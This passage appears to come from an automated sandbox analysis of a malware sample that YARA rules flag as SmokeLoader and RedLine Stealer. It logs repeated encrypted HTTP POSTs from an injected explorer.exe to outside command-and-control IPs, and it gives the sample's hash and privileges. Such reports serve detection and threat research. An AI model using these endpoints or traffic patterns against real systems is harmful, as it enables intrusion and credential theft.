2024-07-24 17:58:56 UTC	1267	OUT	Data Raw: 67 37 4e 38 66 4c 35 52 51 49 78 76 4c 4e 59 2f 71 6a 64 48 4d 5a 49 59 31 37 62 32 7a 38 68 43 54 2f 76 77 55 70 36 4f 6d 4a 56 55 4f 59 4e 6a 50 4a 61 65 50 7a 4e 35 45 4d 56 72 54 4f 4f 44 38 56 57 4e 67 76 73 6a 36 59 69 6b 70 39 34 6e 5a 2f 79 6a 79 4d 78 69 67 64 38 32 74 62 4c 46 57 4d 64 4a 31 6c 7a 48 42 6f 46 30 47 38 55 75 2b 57 30 6b 78 69 6c 56 4d 6e 6c 52 74 73 79 55 43 31 41 59 52 51 4c 6b 2b 6b 59 41 4d 74 65 6e 54 52 34 4f 65 33 2b 58 56 2f 56 53 53 34 44 33 35 72 6f 73 54 67 4a 59 79 37 36 2f 35 64 66 6b 67 6b 53 43 33 37 71 74 49 6f 79 66 2f 62 59 75 72 6f 6d 76 4f 52 51 48 51 69 44 71 39 71 49 2f 34 56 70 48 45 75 71 79 61 66 44 55 63 4d 41 4e 41 4b 30 59 70 6f 48 4c 69 64 79 74 4b 4e 49 4e 2f 6d 5a 70 4c 6c 43 58 45 54 71 54 69 6f 76 Data Ascii: g7N8fL5RQIxvLNY/qjdHMZIY17b2z8hCT/vwUp6OmJVUOYNjPJaePzN5EMVrTOOD8VWNgvsj6Yikp94nZ/yjyMxigd82tbLFWMdJ1lzHBoF0G8Uu+W0kxilVMnlRtsyUC1AYRQLk+kYAMtenTR4Oe3+XV/VSS4D35rosTgJYy76/5dfkgkSC37qtIoyf/bYuromvORQHQiDq9qI/4VpHEuqyafDUcMANAK0YpoHLidytKNIN/mZpLlCXETqTiov
2024-07-24 17:58:58 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Wed, 24 Jul 2024 17:58:57 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-24 17:58:58 UTC	685	IN	Data Raw: 4a 77 52 50 77 4a 72 33 50 70 65 55 55 6a 62 75 4a 4d 66 35 74 68 37 6d 49 48 36 32 46 72 71 56 4c 58 53 57 30 6a 79 35 4b 2b 30 47 30 6c 30 34 5a 4f 57 54 61 41 6e 69 34 50 37 57 30 49 43 62 2b 52 52 2f 35 77 59 38 46 6c 76 32 5a 61 4c 55 50 73 77 52 4d 77 6e 74 39 32 49 61 6f 64 6b 4c 70 4c 46 42 45 73 33 71 2f 37 32 32 37 6d 43 52 75 6e 62 39 6b 75 6c 30 44 69 32 44 70 70 5a 55 71 4d 69 45 72 42 2f 30 6b 68 68 5a 6c 2b 51 62 47 76 6c 6b 30 37 53 53 4c 4b 74 51 35 4d 33 4a 4e 47 72 35 64 51 38 73 5a 44 68 65 45 77 42 2f 68 52 4a 6e 79 6f 39 5a 32 6a 35 4e 36 61 74 69 77 57 6d 6d 69 38 66 62 41 74 65 43 6a 52 6e 2b 47 77 46 36 4c 42 4d 76 78 79 50 4f 4d 39 78 51 59 48 37 68 64 33 33 41 65 76 76 63 53 62 59 31 37 4a 69 4f 59 65 57 45 45 4b 6a 58 65 31 4a Data Ascii: JwRPwJr3PpeUUjbuJMf5th7mIH62FrqVLXSW0jy5K+0G0l04ZOWTaAni4P7W0ICb+RR/5wY8Flv2ZaLUPswRMwnt92IaodkLpLFBEs3q/7227mCRunb9kul0Di2DppZUqMiErB/0khhZl+QbGvlk07SSLKtQ5M3JNGr5dQ8sZDheEwB/hRJnyo9Z2j5N6atiwWmmi8fbAteCjRn+GwF6LBMvxyPOM9xQYH7hd33AevvcSbY17JiOYeWEEKjXe1J

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
91	192.168.2.10	49849	167.235.128.153	443	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-24 17:58:58 UTC	234	OUT	POST / HTTP/1.1 Host: 167.235.128.153 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1267
2024-07-24 17:58:58 UTC	1267	OUT	Data Raw: 69 6b 56 59 55 43 65 6c 44 53 33 4b 52 50 6c 4a 33 39 76 31 79 79 66 39 59 78 45 5a 42 67 6c 39 56 59 30 42 62 52 5a 6d 32 70 5a 2b 44 4a 6b 6b 63 55 30 4f 34 32 59 44 50 4b 39 61 6b 41 37 31 34 36 43 55 44 58 63 63 47 71 41 42 52 45 2b 41 6a 30 61 6b 4e 38 64 56 67 61 2b 33 6e 32 6c 4f 41 37 4c 61 58 6d 33 30 35 63 6a 41 46 4c 54 49 67 55 6c 4b 30 39 63 51 36 34 6d 7a 45 39 33 79 45 42 71 4b 4d 43 6d 6d 35 59 48 52 45 4d 33 68 46 66 34 70 76 49 51 64 55 34 31 77 2f 63 7a 4f 2f 6e 6a 74 58 63 34 62 79 70 4d 46 49 71 58 4c 64 58 6d 79 67 79 5a 39 48 32 53 6e 67 38 4b 76 49 68 4e 6c 56 38 6e 48 71 75 69 39 67 73 66 75 2b 6e 71 73 33 57 6b 56 4e 2f 4b 41 76 62 69 4d 43 6d 63 47 48 33 50 34 2b 58 61 73 59 64 2b 76 43 46 78 52 64 53 61 45 6a 50 48 79 53 2f 76 Data Ascii: ikVYUCelDS3KRPlJ39v1yyf9YxEZBgl9VY0BbRZm2pZ+DJkkcU0O42YDPK9akA7146CUDXccGqABRE+Aj0akN8dVga+3n2lOA7LaXm305cjAFLTIgUlK09cQ64mzE93yEBqKMCmm5YHREM3hFf4pvIQdU41w/czO/njtXc4bypMFIqXLdXmygyZ9H2Sng8KvIhNlV8nHqui9gsfu+nqs3WkVN/KAvbiMCmcGH3P4+XasYd+vCFxRdSaEjPHyS/v
2024-07-24 17:59:00 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Wed, 24 Jul 2024 17:58:59 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-24 17:59:00 UTC	685	IN	Data Raw: 67 41 5a 55 52 6f 57 64 67 38 41 37 69 2f 43 52 56 42 35 57 31 42 71 30 6f 4d 4b 6b 4f 4d 6f 4a 68 53 47 43 79 6b 61 43 45 6f 75 4d 38 6d 4e 4c 36 42 2f 71 52 5a 50 69 64 31 37 4d 55 41 62 54 6c 61 35 5a 71 36 54 4b 71 65 79 6a 54 75 6a 61 5a 54 6e 67 64 44 65 76 73 78 4a 50 49 68 66 57 7a 42 35 73 58 6d 42 71 35 56 61 56 59 46 74 55 33 43 67 69 4f 31 52 4d 73 4d 36 39 52 65 6c 57 44 7a 4c 33 67 45 6c 70 48 73 30 53 45 4b 67 51 2b 4a 37 37 36 37 59 4a 4c 2f 5a 52 6f 30 31 5a 5a 38 35 78 68 67 4f 4d 6a 6c 64 78 69 69 57 55 4c 5a 43 4a 79 57 41 55 6b 2b 4d 34 4d 41 67 53 50 77 5a 64 48 56 70 5a 45 53 48 6a 73 44 4b 74 61 50 6d 77 63 2b 71 38 70 4d 36 4e 44 2b 64 56 4e 6a 44 6c 61 43 2b 47 54 37 44 44 6c 77 68 4a 6a 61 5a 4d 67 58 73 6f 35 32 6e 78 41 68 49 Data Ascii: gAZURoWdg8A7i/CRVB5W1Bq0oMKkOMoJhSGCykaCEouM8mNL6B/qRZPid17MUAbTla5Zq6TKqeyjTujaZTngdDevsxJPIhfWzB5sXmBq5VaVYFtU3CgiO1RMsM69RelWDzL3gElpHs0SEKgQ+J7767YJL/ZRo01ZZ85xhgOMjldxiiWULZCJyWAUk+M4MAgSPwZdHVpZESHjsDKtaPmwc+q8pM6ND+dVNjDlaC+GT7DDlwhJjaZMgXso52nxAhI

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
92	192.168.2.10	49850	107.173.160.137	443	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-24 17:59:00 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.137 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-24 17:59:00 UTC	1122	OUT	Data Raw: 69 4d 5a 69 79 6e 36 4b 67 4d 33 56 4f 74 6f 7a 75 52 4d 31 6e 6a 73 78 4c 35 34 67 4b 35 54 6d 6a 67 67 45 59 44 78 70 52 75 69 50 2f 7a 6d 55 66 63 65 32 76 30 30 6b 76 78 54 4e 72 47 6d 6a 6e 57 73 55 2f 4f 53 6f 4a 4a 64 48 52 73 69 46 2b 33 58 50 4f 4c 46 43 34 33 4a 2f 73 43 6b 6a 56 41 38 39 59 76 42 79 4b 66 75 74 66 36 37 58 6d 58 41 34 73 54 65 5a 56 77 6a 51 54 70 4f 74 48 57 72 56 74 33 61 48 59 58 30 70 70 64 62 50 54 6e 63 50 70 50 72 38 48 62 74 30 68 63 79 4b 63 71 6e 55 2f 6b 75 66 6b 32 79 57 76 7a 6f 4b 78 6a 6f 61 2f 6a 62 75 79 62 48 51 36 73 64 43 52 30 5a 64 76 2f 4b 4b 4a 6d 71 5a 44 51 77 56 61 32 35 4b 76 32 53 32 56 43 70 37 35 64 41 31 57 66 41 54 76 36 2f 72 6b 47 44 4a 2f 5a 64 33 70 4c 66 6a 36 61 31 52 36 75 32 71 32 62 79 Data Ascii: iMZiyn6KgM3VOtozuRM1njsxL54gK5TmjggEYDxpRuiP/zmUfce2v00kvxTNrGmjnWsU/OSoJJdHRsiF+3XPOLFC43J/sCkjVA89YvByKfutf67XmXA4sTeZVwjQTpOtHWrVt3aHYX0ppdbPTncPpPr8Hbt0hcyKcqnU/kufk2yWvzoKxjoa/jbuybHQ6sdCR0Zdv/KKJmqZDQwVa25Kv2S2VCp75dA1WfATv6/rkGDJ/Zd3pLfj6a1R6u2q2by
2024-07-24 17:59:02 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Wed, 24 Jul 2024 17:59:02 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-24 17:59:02 UTC	685	IN	Data Raw: 4e 4c 69 6c 30 63 77 76 30 46 51 50 61 55 38 65 4e 70 72 78 52 69 4c 7a 34 4c 39 69 6f 42 6e 44 77 63 43 2f 4a 75 70 37 51 6d 64 50 68 56 47 39 33 33 47 35 44 61 44 76 65 30 4d 6a 41 30 42 68 76 57 4c 64 61 64 31 6f 35 4c 33 70 55 75 76 44 73 6a 44 65 2b 2b 77 57 57 78 30 34 67 4b 4e 49 65 4e 49 73 53 7a 79 30 50 65 37 74 71 57 6d 6c 2b 64 53 73 50 44 75 64 66 61 2f 33 56 45 33 4f 31 72 46 43 58 63 75 39 69 57 49 41 55 62 35 74 55 4a 61 49 6d 76 66 2b 65 5a 62 34 73 79 34 46 52 4c 52 4b 75 53 53 51 41 44 33 63 4a 39 70 37 77 72 2f 6f 54 55 44 44 50 71 79 41 57 57 36 6f 43 61 53 50 7a 42 37 45 4d 47 76 52 72 4f 59 35 45 79 66 7a 2f 4c 51 76 6b 73 6d 4c 6a 75 68 30 42 34 43 43 49 31 36 4b 38 44 37 47 4a 30 31 39 51 76 6f 61 79 71 63 4d 68 41 6e 70 48 79 33 Data Ascii: NLil0cwv0FQPaU8eNprxRiLz4L9ioBnDwcC/Jup7QmdPhVG933G5DaDve0MjA0BhvWLdad1o5L3pUuvDsjDe++wWWx04gKNIeNIsSzy0Pe7tqWml+dSsPDudfa/3VE3O1rFCXcu9iWIAUb5tUJaImvf+eZb4sy4FRLRKuSSQAD3cJ9p7wr/oTUDDPqyAWW6oCaSPzB7EMGvRrOY5Eyfz/LQvksmLjuh0B4CCI16K8D7GJ019QvoayqcMhAnpHy3

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
93	192.168.2.10	49851	107.173.160.139	443	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-24 17:59:03 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.139 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-24 17:59:03 UTC	1122	OUT	Data Raw: 70 4c 35 4f 41 35 50 62 57 78 54 4a 57 56 75 41 67 47 5a 67 55 75 37 6e 36 75 5a 69 51 4e 34 42 68 6d 54 51 6d 71 4e 76 4b 49 46 36 30 50 45 4e 34 66 75 63 41 6d 55 67 6f 51 47 74 74 48 48 74 41 38 2b 2f 59 54 62 63 66 4c 30 50 32 78 45 55 36 6b 77 30 37 64 65 4d 68 53 37 6d 6b 56 78 49 37 31 75 66 4e 38 73 63 79 6b 37 57 67 70 31 30 55 39 59 2b 73 57 31 75 69 6b 6f 49 43 6f 4e 4a 36 74 44 68 35 49 42 37 67 6f 46 73 38 4c 4e 61 30 43 61 70 69 54 2f 46 37 4b 55 51 71 71 79 6a 66 30 31 70 35 49 41 36 52 78 68 54 49 33 52 48 49 54 37 69 71 54 30 50 62 65 58 59 4c 6f 4e 74 4e 49 48 6c 4a 65 62 2b 4a 74 62 45 51 65 4f 4d 62 34 32 4c 56 6d 6a 74 77 79 44 51 73 59 69 4e 76 4f 79 73 39 63 4f 76 38 65 36 38 2f 35 39 74 6c 59 61 2b 51 6d 6a 6e 56 74 4b 65 51 6d 78 Data Ascii: pL5OA5PbWxTJWVuAgGZgUu7n6uZiQN4BhmTQmqNvKIF60PEN4fucAmUgoQGttHHtA8+/YTbcfL0P2xEU6kw07deMhS7mkVxI71ufN8scyk7Wgp10U9Y+sW1uikoICoNJ6tDh5IB7goFs8LNa0CapiT/F7KUQqqyjf01p5IA6RxhTI3RHIT7iqT0PbeXYLoNtNIHlJeb+JtbEQeOMb42LVmjtwyDQsYiNvOys9cOv8e68/59tlYa+QmjnVtKeQmx
2024-07-24 17:59:04 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Wed, 24 Jul 2024 17:59:04 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-24 17:59:04 UTC	685	IN	Data Raw: 4c 63 52 5a 61 30 58 6c 75 4f 58 50 43 79 62 61 48 71 6b 69 7a 59 74 7a 74 67 64 74 69 36 54 54 73 4d 79 57 74 78 4a 2f 73 42 4a 43 30 50 2f 58 76 54 61 46 5a 51 61 31 53 6b 72 35 2b 52 52 67 57 70 4d 65 4a 48 78 4c 64 47 78 45 44 56 4a 78 4b 45 42 7a 64 61 72 51 4c 43 4e 6f 41 59 6f 46 71 31 45 7a 43 74 66 33 49 49 75 48 33 63 58 66 64 37 62 44 68 51 6c 4c 66 4b 57 63 63 74 45 4e 52 77 68 73 75 38 55 69 4b 6f 53 66 63 55 4e 2f 43 67 2b 79 39 4a 68 34 79 32 4c 49 45 68 55 62 6a 6f 31 70 32 35 55 38 52 38 4a 6a 52 63 78 57 73 6c 31 73 6c 79 6f 4d 31 63 6c 73 57 32 44 66 4b 36 2f 4f 67 54 69 5a 59 70 39 34 4b 36 38 57 45 46 45 49 53 46 71 30 69 37 46 73 71 64 71 62 6f 71 31 5a 6f 39 4c 4d 6a 69 65 4f 78 78 6d 63 72 75 68 74 47 50 64 47 31 59 34 79 75 38 47 Data Ascii: LcRZa0XluOXPCybaHqkizYtztgdti6TTsMyWtxJ/sBJC0P/XvTaFZQa1Skr5+RRgWpMeJHxLdGxEDVJxKEBzdarQLCNoAYoFq1EzCtf3IIuH3cXfd7bDhQlLfKWcctENRwhsu8UiKoSfcUN/Cg+y9Jh4y2LIEhUbjo1p25U8R8JjRcxWsl1slyoM1clsW2DfK6/OgTiZYp94K68WEFEISFq0i7Fsqdqboq1Zo9LMjieOxxmcruhtGPdG1Y4yu8G

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
94	192.168.2.10	49852	167.235.128.153	443	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-24 17:59:05 UTC	234	OUT	POST / HTTP/1.1 Host: 167.235.128.153 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-24 17:59:05 UTC	1122	OUT	Data Raw: 70 78 71 4b 74 65 33 6a 78 4c 6c 77 4d 44 54 7a 6b 4e 79 79 47 5a 37 61 74 75 59 64 59 46 56 36 51 2f 45 2b 4d 59 2f 6f 66 76 2b 4d 71 50 62 2b 42 79 78 46 37 50 4d 34 53 4d 69 67 59 77 31 6f 78 36 45 46 68 56 37 6b 34 5a 4f 7a 7a 67 66 38 75 67 39 67 42 6a 46 43 56 68 4e 77 58 2f 4a 71 36 56 47 42 5a 51 57 58 75 4d 41 73 52 4e 78 42 36 34 68 67 7a 70 7a 2b 65 44 6a 32 6a 70 2b 31 4c 6a 36 62 61 32 4e 55 70 34 47 33 72 75 50 6c 63 6a 6b 6d 55 72 50 72 67 30 48 79 51 57 68 75 50 72 48 4b 4d 59 44 43 70 4b 58 45 47 6c 32 4e 41 49 31 6a 6f 7a 55 39 6d 34 38 5a 46 2b 6a 47 31 35 2b 42 44 50 75 2f 57 38 48 6e 31 34 4b 79 32 77 4a 64 45 6b 31 77 55 59 6d 46 39 6b 42 4b 64 45 35 61 6f 46 4f 55 64 4b 55 36 7a 43 62 6b 61 57 5a 69 30 59 31 68 4f 70 7a 36 57 61 2f Data Ascii: pxqKte3jxLlwMDTzkNyyGZ7atuYdYFV6Q/E+MY/ofv+MqPb+ByxF7PM4SMigYw1ox6EFhV7k4ZOzzgf8ug9gBjFCVhNwX/Jq6VGBZQWXuMAsRNxB64hgzpz+eDj2jp+1Lj6ba2NUp4G3ruPlcjkmUrPrg0HyQWhuPrHKMYDCpKXEGl2NAI1jozU9m48ZF+jG15+BDPu/W8Hn14Ky2wJdEk1wUYmF9kBKdE5aoFOUdKU6zCbkaWZi0Y1hOpz6Wa/
2024-07-24 17:59:06 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Wed, 24 Jul 2024 17:59:06 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-24 17:59:06 UTC	685	IN	Data Raw: 57 5a 7a 4f 63 2f 50 77 74 48 6e 65 77 4c 52 6e 62 33 42 64 41 63 55 68 4e 38 54 6e 32 43 79 73 53 72 50 34 70 31 42 52 56 53 71 4d 66 4e 38 57 4c 49 76 62 6a 56 68 78 33 32 77 50 47 4a 79 5a 56 56 44 79 6e 68 31 49 4e 4d 66 52 49 78 4f 6f 66 73 6f 53 4d 47 51 5a 76 4d 69 45 4e 74 6f 76 31 70 53 73 4d 79 6c 6c 78 4a 39 2b 54 62 6b 41 36 32 31 34 35 46 4e 48 49 58 2b 36 78 74 72 52 49 34 64 31 74 53 71 41 6e 36 6b 61 33 6a 6b 63 6f 78 4e 37 53 43 63 32 47 41 4a 56 6c 74 55 6c 5a 58 30 2f 46 62 7a 4b 55 42 36 75 6d 58 35 54 47 38 49 43 78 59 59 62 48 32 58 4b 57 39 78 7a 42 70 4e 67 66 4d 78 53 69 75 72 79 61 4c 38 55 65 54 75 2b 6b 41 36 37 37 4e 63 44 41 74 59 7a 5a 2b 52 78 4f 56 58 34 75 44 47 46 71 52 44 42 6f 6e 33 6c 63 47 50 6a 6f 67 64 44 55 30 64 Data Ascii: WZzOc/PwtHnewLRnb3BdAcUhN8Tn2CysSrP4p1BRVSqMfN8WLIvbjVhx32wPGJyZVVDynh1INMfRIxOofsoSMGQZvMiENtov1pSsMyllxJ9+TbkA62145FNHIX+6xtrRI4d1tSqAn6ka3jkcoxN7SCc2GAJVltUlZX0/FbzKUB6umX5TG8ICxYYbH2XKW9xzBpNgfMxSiuryaL8UeTu+kA677NcDAtYzZ+RxOVX4uDGFqRDBon3lcGPjogdDU0d

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
95	192.168.2.10	49853	107.173.160.137	443	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-24 17:59:07 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.137 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-24 17:59:07 UTC	1122	OUT	Data Raw: 59 72 32 54 6a 30 68 31 58 30 2f 71 55 72 31 45 6a 56 62 68 32 4c 63 53 39 44 65 58 2b 73 32 31 43 38 46 57 6a 56 59 34 45 4d 47 47 31 6d 55 4c 6d 4c 46 53 72 41 6a 30 33 4b 6a 4f 53 2b 31 38 34 64 69 72 79 2b 77 76 65 50 68 49 2b 48 70 75 57 66 5a 61 78 74 38 4f 32 69 57 36 46 70 6b 41 39 73 34 75 30 6e 41 72 31 61 6a 46 49 6f 6a 33 41 51 70 6f 37 58 5a 74 41 2f 59 71 66 68 6d 63 45 6b 64 54 4c 2b 74 4f 72 37 56 70 74 49 43 74 6e 6b 6a 32 6e 54 34 35 4d 75 58 54 53 4e 55 47 54 6a 55 41 62 57 79 6a 70 33 2f 70 63 2b 32 38 52 6a 6f 48 6b 38 6e 53 62 63 65 75 62 49 72 64 56 78 48 2b 48 4a 70 71 46 56 43 36 77 75 4e 37 2f 79 6f 4b 42 67 4a 77 6c 78 6f 79 47 62 77 53 30 4a 59 62 56 61 4f 72 55 56 57 48 68 47 62 69 4b 6a 39 6b 67 4d 4a 42 6d 77 4c 70 6a 45 4b Data Ascii: Yr2Tj0h1X0/qUr1EjVbh2LcS9DeX+s21C8FWjVY4EMGG1mULmLFSrAj03KjOS+184diry+wvePhI+HpuWfZaxt8O2iW6FpkA9s4u0nAr1ajFIoj3AQpo7XZtA/YqfhmcEkdTL+tOr7VptICtnkj2nT45MuXTSNUGTjUAbWyjp3/pc+28RjoHk8nSbceubIrdVxH+HJpqFVC6wuN7/yoKBgJwlxoyGbwS0JYbVaOrUVWHhGbiKj9kgMJBmwLpjEK
2024-07-24 17:59:08 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Wed, 24 Jul 2024 17:59:08 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-24 17:59:08 UTC	685	IN	Data Raw: 45 49 6d 7a 45 51 4f 63 6f 69 43 30 64 6f 34 4e 4c 41 74 5a 41 6b 74 6f 47 6e 48 33 6a 30 46 4b 54 54 73 6e 79 58 45 4d 6c 46 66 45 4b 70 4d 31 2b 79 4a 4a 79 6d 42 54 43 6d 49 36 76 45 4d 49 36 53 41 45 37 71 48 76 79 53 6e 50 47 6e 66 55 43 52 54 52 2f 5a 53 32 39 43 71 53 4e 66 58 33 77 58 4c 61 6c 74 75 65 4b 66 50 54 44 44 76 72 43 2b 66 44 63 42 34 4f 53 6e 30 62 79 4d 57 50 55 4b 74 4b 73 53 45 46 30 77 44 6d 31 35 49 51 49 51 79 47 72 52 52 61 71 72 75 5a 2f 48 4e 56 55 6d 70 46 61 61 6d 70 32 6a 46 30 6e 50 43 54 44 39 74 59 6f 6e 34 6f 42 50 39 2b 6a 38 63 35 45 63 49 4a 73 7a 4f 48 58 65 5a 62 45 6c 76 78 79 49 4f 67 6a 64 68 47 44 74 57 4a 41 71 2b 58 77 71 45 6a 6d 32 78 67 44 48 45 77 39 4c 34 56 58 48 71 53 7a 59 79 33 52 57 51 4e 49 4a 68 Data Ascii: EImzEQOcoiC0do4NLAtZAktoGnH3j0FKTTsnyXEMlFfEKpM1+yJJymBTCmI6vEMI6SAE7qHvySnPGnfUCRTR/ZS29CqSNfX3wXLaltueKfPTDDvrC+fDcB4OSn0byMWPUKtKsSEF0wDm15IQIQyGrRRaqruZ/HNVUmpFaamp2jF0nPCTD9tYon4oBP9+j8c5EcIJszOHXeZbElvxyIOgjdhGDtWJAq+XwqEjm2xgDHEw9L4VXHqSzYy3RWQNIJh

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
96	192.168.2.10	49854	107.173.160.139	443	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-24 17:59:09 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.139 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-24 17:59:09 UTC	1122	OUT	Data Raw: 67 68 64 72 35 52 4d 73 50 54 4f 7a 76 57 35 35 4f 5a 33 62 59 35 6e 6e 6e 6b 55 4e 68 6b 66 59 4b 68 71 44 6e 32 64 59 4a 73 41 54 58 59 55 52 49 38 2b 46 77 2b 73 45 5a 4b 76 58 58 47 65 59 7a 41 73 79 4c 6d 35 42 2b 2b 32 31 68 54 6f 6d 39 77 42 6f 49 76 66 75 77 56 2b 77 61 2f 64 36 6e 2b 7a 6f 76 59 46 37 52 37 52 56 5a 58 54 4e 34 31 62 48 54 42 74 2f 65 36 53 7a 43 74 62 72 66 43 69 77 79 47 55 61 39 69 36 72 68 73 75 61 46 6d 48 66 35 78 61 5a 4f 65 7a 55 46 55 71 45 76 59 70 6f 6b 32 6c 76 6f 6f 53 76 41 79 6e 6b 59 4f 5a 4c 59 77 2f 4d 6e 64 2b 76 73 35 32 4c 56 36 5a 50 44 6b 47 47 69 77 4b 61 37 48 75 36 56 46 2b 54 59 6e 31 77 34 4c 4f 38 56 64 46 53 67 64 53 34 6f 42 4c 30 30 7a 4e 6f 70 57 6a 49 7a 34 6c 42 33 58 36 76 78 79 34 77 68 41 47 Data Ascii: ghdr5RMsPTOzvW55OZ3bY5nnnkUNhkfYKhqDn2dYJsATXYURI8+Fw+sEZKvXXGeYzAsyLm5B++21hTom9wBoIvfuwV+wa/d6n+zovYF7R7RVZXTN41bHTBt/e6SzCtbrfCiwyGUa9i6rhsuaFmHf5xaZOezUFUqEvYpok2lvooSvAynkYOZLYw/Mnd+vs52LV6ZPDkGGiwKa7Hu6VF+TYn1w4LO8VdFSgdS4oBL00zNopWjIz4lB3X6vxy4whAG
2024-07-24 17:59:10 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Wed, 24 Jul 2024 17:59:10 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-24 17:59:10 UTC	685	IN	Data Raw: 42 5a 36 6b 52 6b 48 6f 58 2f 63 5a 67 6d 6c 39 64 74 75 64 62 75 6e 75 6f 59 36 50 62 31 6e 57 76 57 47 75 44 78 6f 65 6b 46 43 65 73 30 6c 33 76 54 33 65 79 52 4c 62 4b 35 37 67 70 39 4a 34 37 72 76 6f 73 6a 78 79 41 6a 4d 79 42 4d 4e 45 72 52 69 37 67 66 52 74 45 44 78 47 35 6f 6a 4c 64 65 54 35 33 45 49 4e 6f 6e 6d 4b 78 71 69 50 64 41 72 41 34 4d 54 47 76 46 41 52 72 7a 73 32 31 65 49 4f 5a 51 62 37 4a 46 4e 41 62 61 4f 50 79 38 74 31 61 56 45 36 43 6f 57 44 30 63 6c 64 4e 42 38 6a 73 6d 53 74 76 6a 50 2f 45 69 4f 48 66 74 71 38 75 78 58 4a 70 44 4a 30 39 51 47 76 53 31 4c 69 31 73 43 6b 73 51 63 64 57 75 48 77 53 61 52 2b 73 55 74 53 42 4a 34 34 4e 52 76 4d 52 58 6e 42 61 76 50 43 39 75 74 42 7a 68 51 41 4a 2b 4b 72 4d 32 47 54 41 43 42 38 70 57 74 Data Ascii: BZ6kRkHoX/cZgml9dtudbunuoY6Pb1nWvWGuDxoekFCes0l3vT3eyRLbK57gp9J47rvosjxyAjMyBMNErRi7gfRtEDxG5ojLdeT53EINonmKxqiPdArA4MTGvFARrzs21eIOZQb7JFNAbaOPy8t1aVE6CoWD0cldNB8jsmStvjP/EiOHftq8uxXJpDJ09QGvS1Li1sCksQcdWuHwSaR+sUtSBJ44NRvMRXnBavPC9utBzhQAJ+KrM2GTACB8pWt

Target ID:	4
Start time:	13:55:02
Start date:	24/07/2024
Path:	C:\Users\user\Desktop\7Y18r(14).exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\7Y18r(14).exe"
Imagebase:	0x400000
File size:	186'368 bytes
MD5 hash:	779806A66CCCB6B37A02F6B30F7AECF3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000004.00000002.1462369187.0000000000600000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000004.00000002.1462544798.0000000000660000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000004.00000002.1462544798.0000000000660000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000004.00000002.1462755251.00000000006DE000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000004.00000002.1462616334.0000000000681000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000004.00000002.1462616334.0000000000681000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	13:55:02
Start date:	24/07/2024
Path:	C:\Users\user\AppData\Local\Temp\IXDaI.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\IXDaI.exe
Imagebase:	0xba0000
